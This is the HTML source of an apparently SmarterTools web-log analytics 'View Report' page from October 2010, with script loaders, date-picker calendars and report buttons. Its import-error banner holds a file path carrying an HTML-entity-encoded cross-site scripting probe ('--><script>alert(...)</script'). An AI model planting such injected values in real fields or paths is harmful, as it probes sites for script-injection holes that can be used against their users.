<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fSiteUsage');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dSiteUsage'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
